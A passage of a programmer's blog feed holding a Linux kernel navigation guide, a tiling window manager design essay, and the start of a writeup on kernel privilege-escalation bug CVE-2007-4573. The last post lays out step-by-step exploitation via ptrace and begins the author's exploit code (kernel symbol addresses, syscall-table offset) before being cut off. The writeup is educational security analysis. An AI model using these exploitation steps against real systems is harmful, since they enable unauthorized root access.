includes commits where the numbers are different.</p>

<p>So, <code>836f92ad</code>, which has the hunk:</p>

<pre><code>-asmlinkage long sys_vmsplice(int fd, const struct iovec __user *iov,
-                            unsigned long nr_segs, unsigned int flags)
+SYSCALL_DEFINE4(vmsplice, int, fd, const struct iovec __user *, iov,
+               unsigned long, nr_segs, unsigned int, flags)
</code></pre>

<p>doesn&#8217;t change the count of <code>vmsplice</code> instances, and isn&#8217;t flagged
by the pickaxe. But the commit that introduced <code>sys_vmsplice</code> in the
first place had to have, and so the pickaxe flags it.</p></li>
</ul>
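
<p>The pickaxe&#8217;s counting rule described above is simple enough to model in a few
lines of C. This is only a model of the rule as stated, not git&#8217;s implementation,
and both function names are made up for the example.</p>

<pre><code>#include &lt;stddef.h&gt;
#include &lt;string.h&gt;

/* Count non-overlapping occurrences of needle in text. */
static size_t count_occurrences(const char *text, const char *needle) {
    size_t n = 0, len = strlen(needle);
    const char *p;
    if (len == 0)
        return 0;
    for (p = strstr(text, needle); p != NULL; p = strstr(p + len, needle))
        n++;
    return n;
}

/* In this model, a commit is selected when the count changes across it. */
static int pickaxe_selects(const char *before, const char *after,
                           const char *needle) {
    return count_occurrences(before, needle) !=
           count_occurrences(after, needle);
}
</code></pre>

<p>Fed the two sides of the <code>836f92ad</code> hunk, the count of <code>vmsplice</code> is one
both before and after, so the commit is skipped; searching for
<code>sys_vmsplice</code> instead would select it.</p>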

<h2>Know your idioms</h2>

<p>One of the advantages of the centrally-controlled model of Linux,
where almost all changes, at least to the core code, are code-reviewed
extensively on the <a href="http://lkml.org/">LKML</a>, is that the code tends to have a very
high standard of stylistic and idiomatic consistency. So once you
learn some of the common idioms of kernel development, you can
recognize them everywhere, and infer information about the structure
of a piece of code without having to go read all of the details.</p>

<p>A corollary that I&#8217;ve found here is: Trust your instincts. If you
think you recognize a pattern in the code, or if there is some way in
which it seems like the code &#8220;ought to be working&#8221;, you&#8217;re usually
well served by assuming that your hunch is right and proceeding based
off of that, and coming back later to check your assumptions if
necessary, instead of stopping at every step to verify your
guesses. Because the code is, in general, of very high quality and
consistency, once you start developing familiarity with it, your
guesses will be right far more often than not.</p>

<p>I won&#8217;t attempt an exhaustive list of design patterns and
idioms in the Linux kernel, but here are some it&#8217;s pretty essential to
be familiar with:</p>

<ul>
<li><p>The <code>_ops</code> struct &#8212; Linux uses an OO-esque style ubiquitously in
the kernel, where structs of function pointers (basically a
poor-man&#8217;s <code>vtable</code>, to you C++ programmers), are passed around and
stored to indicate how to work with some object. These <code>struct</code>s are
known as &#8220;ops&#8221; structures, and typically have types named
<code>FOO_operations</code>, and live in variables named <code>SOMETHING_ops</code> &#8211;
<code>struct super_operations</code>, <code>struct inode_operations</code>, <code>struct
file_operations</code>, and so on.</p></li>
<li><p><code>struct list_head</code>, defined in <code>include/linux/types.h</code>, with
operations in <code>include/linux/list.h</code> is used basically anywhere the
kernel needs to store linked lists. To save on space and reduce
fragmentation, the kernel uses a trick where <code>struct list_head</code>s are
stored inside the structures that are the element of a list, and
pointer arithmetic is used to compute the one from the
other. Familiarize yourself with <code>list.h</code>, since it&#8217;s a rare piece
of code that won&#8217;t use at least some of its functionality.</p></li>
<li><p><code>container_of</code> and related idioms. The trick I mentioned previously,
of storing a <code>list_head</code> inside a structure and using pointer
arithmetic, is generalized in many places, through the
<code>container_of</code> macro.</p>

<p>Let&#8217;s consider the problem of implementing a filesystem, say,
<code>ext2</code>. Linux&#8217;s VFS layer has a generic <code>inode</code> structure, which
stores filesystem-independent information about inodes. <code>ext2</code>,
however, has some additional information it needs to store on each
in-memory inode. A standard userspace approach would be for <code>struct
inode</code> to contain a <code>void *userdata</code> pointer, and <code>ext2</code> could
allocate a <code>struct ext2_inode_info</code>, and point <code>userdata</code> at that.</p>

<p>This means that creating an inode needs two allocations, however,
which is inefficient and causes fragmentation in the memory
allocator, which is unacceptable in the kernel.</p>

<p>Instead, ext2 embeds the <code>struct inode</code> <em>inside</em> <code>struct
ext2_inode_info</code>:</p>

<pre><code>/*
 * second extended file system inode data in memory
 */
struct ext2_inode_info {
        __le32  i_data[15];
        …
        struct inode    vfs_inode;
        …
};
</code></pre>

<p>(See <code>fs/ext2/ext2.h</code> for the full definition)</p>

<p>Then, whenever ext2 gets a callback from the VFS with a <code>struct
inode</code>, it can retrieve the <code>ext2_inode_info</code> using:</p>

<pre><code>static inline struct ext2_inode_info *EXT2_I(struct inode *inode)
{
        return container_of(inode, struct ext2_inode_info, vfs_inode);
}
</code></pre>

<p>This uses the <code>container_of</code> macro, which in this case is used to
find the object of type <code>ext2_inode_info</code> which contains the object
<code>inode</code> in the member named <code>vfs_inode</code>. The implementation of this
macro is somewhat hairy and relies on GCC extensions when available,
but you should be able to see that in the end it will compile down
to a simple subtraction &#8212; about as efficient as you could hope for.</p></li>
</ul>
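<p>To make the subtraction concrete, here is a minimal userspace sketch of the <code>container_of</code> idiom. It is not the kernel&#8217;s implementation: this <code>container_of</code> is a simplified stand-in built on the standard <code>offsetof</code>, without the type checking the kernel macro adds, and <code>struct demo_inode</code>, <code>struct demo_fs_inode_info</code>, and <code>DEMO_I</code> are hypothetical names invented for illustration.</p>

```c
#include <stddef.h>

/* Simplified userspace stand-in for the kernel's container_of: step back
 * from a member pointer by the member's offset to reach the enclosing
 * struct. The real macro layers type checking on top of this. */
#define container_of(ptr, type, member) \
        ((type *)((char *)(ptr) - offsetof(type, member)))

/* Hypothetical stand-in for the generic struct inode. */
struct demo_inode {
        unsigned long i_ino;
};

/* Hypothetical stand-in for a filesystem's private per-inode struct. */
struct demo_fs_inode_info {
        int fs_private;               /* filesystem-specific state */
        struct demo_inode vfs_inode;  /* generic part, embedded rather than pointed to */
};

/* Same shape as EXT2_I(): recover the container from the embedded member. */
static inline struct demo_fs_inode_info *DEMO_I(struct demo_inode *inode)
{
        return container_of(inode, struct demo_fs_inode_info, vfs_inode);
}
```

<p>Given a pointer to the embedded <code>vfs_inode</code> member of some <code>struct demo_fs_inode_info</code>, <code>DEMO_I</code> returns a pointer to that enclosing structure, with a single allocation and no back-pointer stored anywhere.</p>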

<h2>Know your references</h2>

<p>While sourcediving is the ultimate way to answer any question about
the kernel, and is lots of fun to boot, don&#8217;t forget about the
possibility of documentation answering your question, or at least
pointing you in the right direction. Some places that are essential to
look include:</p>

<ul>
<li><p><a href="http://oreilly.com/catalog/9780596005658"><em>Understanding the Linux Kernel</em></a> &#8212; This book is an
incredibly detailed walkthrough of the inner implementation of
virtually every feature and subsystem in the kernel, as of version
2.6.11. It&#8217;s starting to show its age in some places, but it&#8217;s still
largely quite accurate, and is an essential guide for anyone who&#8217;s
serious about, well, understanding the Linux kernel.</p></li>
<li><p><a href="http://lwn.net/">LWN</a> &#8212; LWN (Linux Weekly News) is an excellent publication,
and anyone who hacks on Linux or cares about its development is
well-advised to subscribe. Rarely does a new feature go into Linux
without an incredibly detailed writeup on LWN, including the history
of the feature, details of its development, and a low-level
explanation of how it works and its APIs.</p>

<p>Even without a subscription, old articles are all freely available,
and you&#8217;re well-advised to search LWN&#8217;s <a href="http://lwn.net/Kernel/Index/">kernel index</a>
for anything applicable to your problem.</p></li>
<li><p>The LKML &#8212; The Linux Kernel Mailing List is where almost all the
action happens in the Linux development community. Few features go
in without being hotly debated on this mailing list, and discussions
often lend useful insight into the design and implementation of the
feature in question.</p>

<p>Because patches tend to be submitted to the LKML by email, a good
first step in finding discussion of a specific patch is just
to plug its subject (the first line of the commit message) into
Google or your favorite LKML archive&#8217;s search engine.</p></li>
</ul>

<p>Well, this has been quite the braindump. I hope this turns out to be
useful to someone, and please comment if you have other advice or
resources you recommend for getting into the Linux source code.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/08/navigating-the-linux-kernel/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>The Window Manager I Want</title>
		<link>http://blog.nelhage.com/2010/05/the-window-manager-i-want/</link>
		<comments>http://blog.nelhage.com/2010/05/the-window-manager-i-want/#comments</comments>
		<pubDate>Sun, 09 May 2010 21:08:47 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[linux]]></category>
		<category><![CDATA[emacs]]></category>
		<category><![CDATA[ratpoison]]></category>
		<category><![CDATA[ui]]></category>
		<category><![CDATA[window manager]]></category>
		<category><![CDATA[xmonad]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=220</guid>
		<description><![CDATA[Since I first discovered ratpoison in 2005 or so, I&#8217;ve basically exclusively used tiling window managers, going through, over the years, StumpWM, Ion 3, and finally XMonad. They&#8217;ve all had various strengths and weaknesses, but I&#8217;ve never been totally happy with any of them. This blog entry is a writeup of what I want to [...]]]></description>
			<content:encoded><![CDATA[<div id="outline-container-1" class="outline-2">
<div id="text-1">

<p>Since I first discovered <a href="http://www.nongnu.org/ratpoison/">ratpoison</a> in 2005 or so, I&#8217;ve basically
exclusively used tiling window managers, going through, over the
years, <a href="http://www.nongnu.org/stumpwm/">StumpWM</a>, <a href="http://en.wikipedia.org/wiki/Ion_(window_manager)">Ion 3</a>, and finally <a href="http://xmonad.org/">XMonad</a>. They&#8217;ve all had various
strengths and weaknesses, but I&#8217;ve never been totally happy with any
of them. This blog entry is a writeup of what I want to see as a
window manager. It&#8217;s possible that some day I&#8217;ll get annoyed enough to
write it, but maybe this post will inspire someone else to (not
likely, but I can hope).
</p>

</div>

<div id="outline-container-1.1" class="outline-3">
<h3 id="sec-1.1">Layout </h3>
<div id="text-1.1">


<p>
At any given moment, the screen<sup><a class="footref" name="fnr.1" href="#fn.1">1</a></sup>
is divided into one or more <b>panes</b>. These panes always tile the
screen. Each pane may or may not currently be displaying a window. If
it is not, then the desktop will be displayed in that pane.
</p>
<p>
The primitive operations you can perform on panes include, but are
not necessarily limited to:
</p>
<dl>
<dt>Split</dt><dd>
Splits the focused pane into two equally-sized panes,
either horizontally or vertically. One of the child panes
will display whichever window the previous pane displayed,
the other is empty.
</dd>
<dt>Resize</dt><dd>
Change the relative size of two child panes that were
split from the same parent.
</dd>
<dt>Kill Pane</dt><dd>
Destroy the current pane. If it is displaying a window,
that window is not sent a close message. The pane&#8217;s
sibling pane expands to consume its space.
</dd>
<dt>Next/Previous pane</dt><dd>
Focus the next or previous pane. Panes are
ordered based on position on the screen, regardless of how they
were split to arrive at the current layout.
</dd>
<dt>Goto Pane</dt><dd>
Panes are numbered, based on their location on
screen. <code>Mod-N</code> focuses the Nth pane.

</dd>
</dl>
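<p>
One way these operations could be modeled is as a binary tree of panes, where each split turns a leaf into an internal node with two children. The following is only a sketch of a possible data structure, not code from any existing window manager: every name in it is hypothetical, a window is reduced to an opaque <code>unsigned long</code> id with 0 meaning &#8220;empty&#8221;, and only Split and Kill Pane are shown.
</p>

```c
#include <stdlib.h>

enum split_dir { SPLIT_HORIZONTAL, SPLIT_VERTICAL };

/* A pane is either a leaf (shows one window, or the desktop when window
 * is 0) or an internal node whose two children tile its area. */
struct pane {
        struct pane *parent;
        struct pane *child[2];   /* both NULL for a leaf */
        enum split_dir dir;      /* meaningful only for internal nodes */
        double ratio;            /* share of the area given to child[0] */
        unsigned long window;    /* hypothetical window id; 0 means empty */
};

static struct pane *pane_new(struct pane *parent, unsigned long window)
{
        struct pane *p = calloc(1, sizeof(*p));
        if (p) {
                p->parent = parent;
                p->window = window;
        }
        return p;
}

/* Split: the leaf becomes an internal node with two equal children. The
 * first child keeps the old window, the second starts out empty.
 * Returns 0 on success, -1 on allocation failure or if p is not a leaf. */
static int pane_split(struct pane *p, enum split_dir dir)
{
        if (p->child[0])
                return -1;
        struct pane *a = pane_new(p, p->window);
        struct pane *b = pane_new(p, 0);
        if (!a || !b) {
                free(a);
                free(b);
                return -1;
        }
        p->child[0] = a;
        p->child[1] = b;
        p->dir = dir;
        p->ratio = 0.5;
        p->window = 0;
        return 0;
}

/* Kill Pane: remove a leaf and let its sibling take over the parent's
 * slot. The window itself is untouched; it just stops being displayed.
 * Returns the pane that now fills the space, or NULL if p is the root
 * or not a leaf. */
static struct pane *pane_kill(struct pane *p)
{
        struct pane *parent = p->parent;
        if (!parent || p->child[0])
                return NULL;
        struct pane *sib = parent->child[parent->child[0] == p ? 1 : 0];

        /* Copy the sibling's contents into the parent node, so existing
         * pointers to the parent (including the root) stay valid. */
        parent->child[0] = sib->child[0];
        parent->child[1] = sib->child[1];
        parent->dir = sib->dir;
        parent->ratio = sib->ratio;
        parent->window = sib->window;
        if (parent->child[0]) {
                parent->child[0]->parent = parent;
                parent->child[1]->parent = parent;
        }
        free(sib);
        free(p);
        return parent;
}
```

<p>
Resize would then be a matter of adjusting <code>ratio</code> on the shared parent, and Next/Previous pane a walk over the leaves in screen order.
</p>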
</div>

</div>

<div id="outline-container-1.2" class="outline-3">
<h3 id="sec-1.2">Selecting windows </h3>
<div id="text-1.2">


<p>
There is a global list of all windows. Windows are ordered arbitrarily
in this list (maybe based on the order they were opened?). Every
window has a name, which is initially set to the <code>WM_NAME</code> property
set by the window&#8217;s client.
</p>
<p>
The following operations are available to manipulate windows:
</p>
<dl>
<dt>Next/Previous Window</dt><dd>
Replace the window in the current pane with
the next or previous window in the list.
</dd>
<dt>Rename</dt><dd>
Prompts for a new name for the current window. If the user
enters an empty string, the window reverts to the default
behavior of using the <code>WM_NAME</code>.
</dd>
<dt>Goto Window</dt><dd>
Prompts for the name of a window to switch to. This
prompt matches on substrings or even sub-sequences of
the window name, displaying the result of the
selection as you type. After typing some characters,
you can scroll through the list to select an entry,
instead of completing typing.
</dd>
<dt>Kill</dt><dd>
Sends a close message to the window in the focused pane.

</dd>
</dl>
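<p>
The sub-sequence matching that Goto Window asks for is cheap to implement. A minimal sketch follows; the function name is hypothetical, and ignoring ASCII case is an assumption, since the description above doesn&#8217;t say how case should be handled.
</p>

```c
#include <ctype.h>
#include <stdbool.h>

/* Returns true if every character of query appears in name in the same
 * order, not necessarily adjacent, ignoring ASCII case. A substring match
 * is the special case where the characters happen to be adjacent. */
static bool matches_subsequence(const char *query, const char *name)
{
        while (*query && *name) {
                if (tolower((unsigned char)*query) ==
                    tolower((unsigned char)*name))
                        query++;   /* consumed one query character */
                name++;
        }
        return *query == '\0';
}
```

<p>
The prompt would run this against every window name on each keystroke and display the names that still match.
</p>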
</div>

</div>

<div id="outline-container-1.3" class="outline-3">
<h3 id="sec-1.3">Desktops </h3>
<div id="text-1.3">


<p>
It seems likely I will want multiple desktops. Each desktop will have
its own pane layout. However, the window list is still global, not
per-desktop. <code>Goto Window</code> will always operate on the global window
list. Selecting a window that is visible through a pane somewhere else
causes that pane to become empty.
</p>
<p>
Alternately, there is no concept of multiple desktops. However, there
is the ability to save and restore layouts, meaning both the layout of
the panes on the screen, and the list of which window is in each
pane. The primary difference here is that a window can be associated
with multiple panes in different saved layouts, and gets resized/moved
as necessary as you switch layouts. I suspect I like this model better.
</p>
</div>

</div>

<div id="outline-container-1.4" class="outline-3">
<h3 id="sec-1.4">Postscript </h3>
<div id="text-1.4">


<p>
If this sounds familiar to you, it probably should. What I&#8217;ve
described is essentially identical to how emacs manages buffers and
windows (analogous to X windows and panes in the above, respectively),
with <a href="http://www.emacswiki.org/emacs/window-number.el">window-number.el</a> and either <a href="http://www.emacswiki.org/emacs/IswitchBuffers">iswitchb</a> or <a href="http://www.emacswiki.org/emacs/InteractivelyDoThings">ido</a>. I manage hundreds
of buffers in emacs this way, and complicated screen layouts, whenever
I&#8217;m doing any hacking, and I love it.
</p>
<p>
I would in fact be tempted to write my window manager into emacs
itself, except for the annoying fact that emacs is very much
single-threaded. It&#8217;s already annoying enough when the network drops and a
hung network filesystem takes down my emacs waiting for a timeout; it
would be utterly unacceptable if that took down my entire window
manager, too.
</p>

<p>
I&#8217;d alternately be tempted to try to make this an XMonad plugin, but I
think that it&#8217;s sufficiently different from XMonad&#8217;s data model that
the impedance mismatch would suck.
</p>

</div>
</div>
</div>

<p><div id="footnotes">
<h2 class="footnotes">Footnotes: </h2>
<div id="text-footnotes">
<p class="footnote"><sup><a class="footnum" name="fn.1" href="#fnr.1">1</a></sup> I&#8217;m only going to consider the
single-monitor case for now, but the generalization should be easy.
</p>
</div>
</div></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.nelhage.com/2010/05/the-window-manager-i-want/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>CVE-2007-4573: The Anatomy of a Kernel Exploit</title>
		<link>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/</link>
		<comments>http://blog.nelhage.com/2010/02/cve-2007-4573-the-anatomy-of-a-kernel-exploit/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 03:32:31 +0000</pubDate>
		<dc:creator>nelhage</dc:creator>
				<category><![CDATA[Computer Security]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[exploits]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.nelhage.com/?p=99</guid>
		<description><![CDATA[CVE-2007-4573 is two years old at this point, but it remains one of my favorite vulnerabilities. It was a local privilege-escalation vulnerability on all x86_64 kernels prior to v2.6.22.7. It&#8217;s very simple to understand with a little bit of background, and the exploit is super-simple, but it&#8217;s still more interesting than Yet Another NULL Pointer [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4573">CVE-2007-4573</a>
is two years old at this point, but it remains one of my favorite
vulnerabilities. It was a local privilege-escalation vulnerability on
all <code>x86_64</code> kernels prior to <code>v2.6.22.7</code>. It&#8217;s very simple to
understand with a little bit of background, and the exploit is
super-simple, but it&#8217;s still more interesting than Yet Another NULL
Pointer Dereference. Plus, it was the first kernel bug I wrote an
exploit for, which was fun.</p>

<p>In this post, I&#8217;ll write up my exploit for CVE-2007-4573, and try to
give enough background for someone with some experience with C, Linux,
and a bit of x86 assembly to understand what&#8217;s going on. If you&#8217;re an
experienced kernel hacker, you probably won&#8217;t find much new here, but
if you&#8217;re not, hopefully you&#8217;ll get a sense for some of the pieces
that go into a kernel exploit.</p>

<h2>The patch</h2>

<p>I&#8217;ll start out with the patch, or rather a slightly simplified
version, that omits some hunks that will be irrelevant for my
discussion. Then I&#8217;ll explain the context for the patch, and by that
point we&#8217;ll have enough context to understand the exploit code.</p>

<p>A simplified version of the patch follows. (The original is
<a href="http://git.kernel.org/linus/176df2457ef6207156ca1a40991c54ca01fef567"><code>176df245</code></a>
in Linus&#8217;s git repository.) Note that this patch was applied to v2.6.22,
and these files have since moved around, so pull out an older kernel if
you&#8217;re trying to follow along at home:</p>

<pre><code>--- a/arch/x86_64/ia32/ia32entry.S
+++ b/arch/x86_64/ia32/ia32entry.S
@@ -38,6 +38,18 @@
        movq    %rax,R8(%rsp)
        .endm

+       .macro LOAD_ARGS32 offset
+       movl \offset(%rsp),%r11d
+       movl \offset+8(%rsp),%r10d
+       movl \offset+16(%rsp),%r9d
+       movl \offset+24(%rsp),%r8d
+       movl \offset+40(%rsp),%ecx
+       movl \offset+48(%rsp),%edx
+       movl \offset+56(%rsp),%esi
+       movl \offset+64(%rsp),%edi
+       movl \offset+72(%rsp),%eax
+       .endm
@@ -334,7 +346,7 @@ ia32_tracesys:
        movq $-ENOSYS,RAX(%rsp) /* really needed? */
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
-       LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
+       LOAD_ARGS32 ARGOFFSET  /* reload args from stack in case ptrace changed it */
        RESTORE_REST
        jmp ia32_do_syscall
 END(ia32_syscall)
</code></pre>

<p>The patch defines the <code>LOAD_ARGS32</code> macro, and replaces <code>LOAD_ARGS</code>
with it in several places (I&#8217;ve only shown one for
simplicity). <code>LOAD_ARGS32</code> differs only slightly from the <code>LOAD_ARGS</code>
macro that it is replacing, which is defined in
<code>include/asm-x86_64/calling.h</code>:</p>

<pre><code>.macro LOAD_ARGS offset
movq \offset(%rsp),%r11
movq \offset+8(%rsp),%r10
movq \offset+16(%rsp),%r9
movq \offset+24(%rsp),%r8
movq \offset+40(%rsp),%rcx
movq \offset+48(%rsp),%rdx
movq \offset+56(%rsp),%rsi
movq \offset+64(%rsp),%rdi
movq \offset+72(%rsp),%rax
.endm
</code></pre>

<p>As the name suggests, <code>LOAD_ARGS32</code> loads the registers from the stack
as 32-bit values, rather than 64-bit. Importantly, in doing so it
takes advantage of a quirk in the <code>x86_64</code> architecture, that causes
the top 32 bits of the registers to be zeroed if you write to the
32-bit versions. <code>LOAD_ARGS32</code> thus zero-extends the 32-bit values it
loads into the 64-bit registers.</p>
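<p>The difference between the two macros can be modeled in plain C. This is only an illustration of the semantics, not kernel code: <code>load_arg64</code> and <code>load_arg32</code> are hypothetical helpers, and the cast to <code>uint32_t</code> stands in for a <code>movl</code> into a 32-bit register.</p>

```c
#include <stdint.h>

/* Models `movq slot,%reg`: all 64 bits of the saved stack slot are loaded. */
static uint64_t load_arg64(uint64_t slot)
{
        return slot;
}

/* Models `movl slot,%reg32`: only the low 32 bits are read, and writing
 * the 32-bit register clears the upper half of the 64-bit register. */
static uint64_t load_arg32(uint64_t slot)
{
        return (uint64_t)(uint32_t)slot;
}
```

<p>For a saved slot holding <code>0x0000000100000005</code>, the first helper returns the value unchanged, while the second returns 5.</p>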

<h2>System call handling</h2>

<p>So, why is this patch so important? Let&#8217;s look at the context for the
<code>LOAD_ARGS</code> → <code>LOAD_ARGS32</code> change. <code>ia32entry.S</code> contains the
definitions for entry-points for 32-bit compatibility-mode system
calls on an <code>x86_64</code> processor. These are the entry points used by 32-bit processes
running on the 64-bit machine, and by 64-bit processes that use
old-style <code>int $0x80</code> system calls for whatever reason.</p>

<p>There are three entry points in the file, one for 32-bit <code>SYSCALL</code>
instructions, one for 32-bit <code>SYSENTER</code>, and one for <code>int $0x80</code>. They
are all very similar, and we will only consider the <code>int $0x80</code> case
here. At boot-time, Linux configures the processor so that <code>int $0x80</code>
will dispatch to the <code>ia32_syscall</code> entry point. Ignoring a bunch of
debugging information, tracing, and other junk, this entry point&#8217;s
code is essentially simple:</p>

<pre><code>ENTRY(ia32_syscall)
        movl %eax,%eax

        pushq %rax
        SAVE_ARGS 0,0,1

        GET_THREAD_INFO(%r10)
        orl   $TS_COMPAT,TI_status(%r10)
        testl $_TIF_WORK_SYSCALL_ENTRY,TI_flags(%r10)
        jnz ia32_tracesys

        cmpl $(IA32_NR_syscalls-1),%eax
        ja ia32_badsys

ia32_do_call:
        IA32_ARG_FIXUP
        call *ia32_sys_call_table(,%rax,8)

        movq %rax,RAX-ARGOFFSET(%rsp)
        jmp int_ret_from_sys_call
</code></pre>

<p><code>%eax</code>, according to Linux&#8217;s syscall convention, stores the syscall number. The <code>movl</code> zero-extends it into <code>%rax</code>, and then we save it and the syscall arguments onto the stack.</p>

<p>The next block retrieves the <code>struct thread_info</code> for the current task,  sets the <code>TS_COMPAT</code> status bit to indicate that we&#8217;re handling a 32-bit compatibility mode syscall, and then
checks the thread&#8217;s flags to determine whether this thread has been flagged for extra processing on syscall entry. If so, we jump away to
code to handle that work.</p>

<p>Next (at the <code>cmpl</code>), we check to make sure that the requested syscall is in-bounds, and branch to an error path if not.</p>

<p><code>IA32_ARG_FIXUP</code> is a simple macro that moves registers around to
translate between the Linux syscall calling convention and the
<code>x86_64</code> calling convention, which each hold arguments in different
registers. Once we&#8217;ve fixed up the registers, the <code>call</code> instruction indexes the system call table by the system call number, looks up the address stored there, and calls into it to dispatch the syscall.</p>

<p>Finally, we save the return code from the system call into the register area on the stack, and jump to code to handle the return to userspace.</p>

<hr />

<p>One thing we should notice about this code is that when we
check that the syscall is in bounds, we compare against the 32-bit
<code>%eax</code> register, but when we actually dispatch the syscall, we use
the full 64 bits in <code>%rax</code>. The <code>movl</code> at the top of the function serves to zero-extend <code>%eax</code>, so that normally, the top 32 bits of <code>%rax</code> are zero, and this distinction doesn&#8217;t matter.</p>

<p>The problem arises in the &#8220;traced&#8221; path in <code>ia32_tracesys</code>, which is (again, with some
extra code removed):</p>

<pre><code>ia32_tracesys:
        movq %rsp,%rdi        /* &amp;pt_regs -&gt; arg1 */
        call syscall_trace_enter
        LOAD_ARGS ARGOFFSET  /* reload args from stack in case ptrace changed it */
        jmp ia32_do_call
</code></pre>

<p>Essentially, <code>ia32_tracesys</code> just calls into the C function
<code>syscall_trace_enter</code>, with a pointer to the registers saved on the stack,
and then restores the register values from the stack and jumps back to
execute the system call.</p>

<p>Herein lies the problem. If <code>syscall_trace_enter</code> replaces the on-stack <code>%rax</code> with a 64-bit value, and <code>LOAD_ARGS</code> restores it, then the <code>%eax</code>/<code>%rax</code> distinction above starts to matter.
As long as <code>%eax</code> is no greater than <code>(IA32_NR_syscalls-1)</code>, the bounds check passes, yet <code>%rax</code> can be much larger than the size of the syscall table, causing the <code>call</code> to index off the end of it.</p>
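<p>The mismatch is easy to see in a small C model of the two steps. This is a sketch, not kernel code: both helpers are hypothetical, and <code>DEMO_NR_SYSCALLS</code> is a placeholder, since the real <code>IA32_NR_syscalls</code> depends on the kernel version.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Placeholder table size; the real IA32_NR_syscalls depends on the kernel. */
#define DEMO_NR_SYSCALLS 320u

/* Models `cmpl $(NR-1),%eax; ja bad`: only the low 32 bits are compared. */
static bool passes_bounds_check(uint64_t rax)
{
        return (uint32_t)rax <= DEMO_NR_SYSCALLS - 1;
}

/* What the check was meant to guarantee: the full 64-bit index used by
 * the `call` instruction actually falls inside the table. */
static bool index_in_table(uint64_t rax)
{
        return rax < DEMO_NR_SYSCALLS;
}
```

<p>A value such as <code>(1 &lt;&lt; 32) | 5</code> satisfies the first predicate but not the second, which is exactly the gap the traced path leaves open.</p>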

<h2>ptrace(2)</h2>

<p>So what happens inside <code>syscall_trace_enter</code>, and how can we take
advantage of that to load a 64-bit value into the restored <code>%rax</code>?
Well, that turns out to be the code that handles processes traced by
the <code>ptrace(2)</code> process-tracing mechanism, which among other things,
allows the tracer to stop a child process before each system call, and
inspect and modify the child&#8217;s registers before the system call proceeds.</p>

<p>Reading <code>ptrace(2)</code>, we find that we can use <code>ptrace(PTRACE_SYSCALL,…)</code>
to cause a process to execute until its next system call, and then,
once it&#8217;s stopped, we can use <code>ptrace(PTRACE_POKEUSER,…)</code> to modify
the tracee&#8217;s registers.</p>

<h2>Putting it all together</h2>

<p>So, to exploit this bug, we need to:</p>

<ul>
<li>Have a 64-bit process attach to some process with <code>ptrace</code>.</li>
<li>Use <code>PTRACE_SYSCALL</code> to stop that process at its next syscall.</li>
<li>Have the process execute an <code>int $0x80</code>.</li>
<li>Have the parent modify <code>%rax</code> in the child to be 64 bits wide, and
allow the child to continue.</li>
</ul>

<p>At this point, the child will index waaay off the end of the syscall
table &#8212; so far off, in fact, that it will wrap around past the end of
memory (On <code>x86_64</code>, the entire kernel is mapped into the last
2 GB of address space). Since the kernel and user programs run in the same
address space, this means that, with an appropriate choice of <code>%rax</code>, the kernel will dereference an address
in the user address space to find out the address of the function it should jump to in order to handle the system call.</p>
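<p>The wrap-around is plain 64-bit arithmetic. The sketch below works it through for the sample <code>ia32_sys_call_table</code> address used in the exploit listing in this post. The helper names are hypothetical, and the user/kernel boundary at 2<sup>47</sup> assumes the usual 48-bit virtual addressing on <code>x86_64</code>.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Address read by `call *table(,%rax,8)`: the index is scaled by the
 * 8-byte entry size and the sum wraps modulo 2^64. */
static uint64_t slot_address(uint64_t table, uint64_t index)
{
        return table + 8 * index;
}

/* Start of the 4 KiB page containing addr. */
static uint64_t page_base(uint64_t addr)
{
        return addr & ~UINT64_C(0xFFF);
}

/* Assumes 48-bit virtual addresses: the lower canonical half, below
 * 2^47, is the part of the address space available to user programs. */
static bool is_user_half(uint64_t addr)
{
        return addr < (UINT64_C(1) << 47);
}
```

<p>With a table at <code>0xffffffff8044b8a0</code> and an index of <code>1 &lt;&lt; 32</code>, the slot address wraps to <code>0x000000078044b8a0</code>, on the page starting at <code>0x000000078044b000</code>, which is well inside the user half.</p>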

<p>My entire exploit code follows.  This is not fully weaponized at all
&#8211; it depends on tweaking for the specific target kernel, for one, but
it works. (Well, if you can find an unpatched kernel anywhere any more
these days, it works). Nowadays, if I were writing an exploit like
this, I&#8217;d plug it into something like Brad Spengler&#8217;s
<a href="http://www.milw0rm.com/exploits/9627">Enlightenment</a>, which takes
care of most of the annoying bits of executing shell-code in-kernel to
change the current user, disable any security modules that might be
problematic, and work across kernel versions, as necessary.</p>

<pre><code>#include &lt;sys/ptrace.h&gt;
#include &lt;sys/user.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;sys/wait.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;string.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;stddef.h&gt;

/**
 * Replace these with the values of `ia32_sys_call_table' and
 * `set_user' from /proc/kallsyms or /boot/System.map-$(uname -r)
 */
#define syscall_table 0xffffffff8044b8a0
#define set_user      0xffffffff8028d785

/*
 We don't _need_ these -- with only a little bit of cleverness, we can
 get around not knowing them, but having them will make the code
 simpler.

 set_user is defined in kernel/sys.c, and can be used to change the
 UID of the current process. We'll trick the kernel into calling it on
 our behalf, and thus avoid having to write any code to run in
 kernel-mode ourselves.
*/

#define offset        (1L &lt;&lt; 32)
#define landing       (syscall_table + 8*offset)
/*
  'offset' is the 64-bit value we will load into %rax using ptrace().

  This will cause the "call" instruction we saw above to look up the
  value stored at that index off the syscall table, which is the
  address we compute in "landing".
 */


int main() {
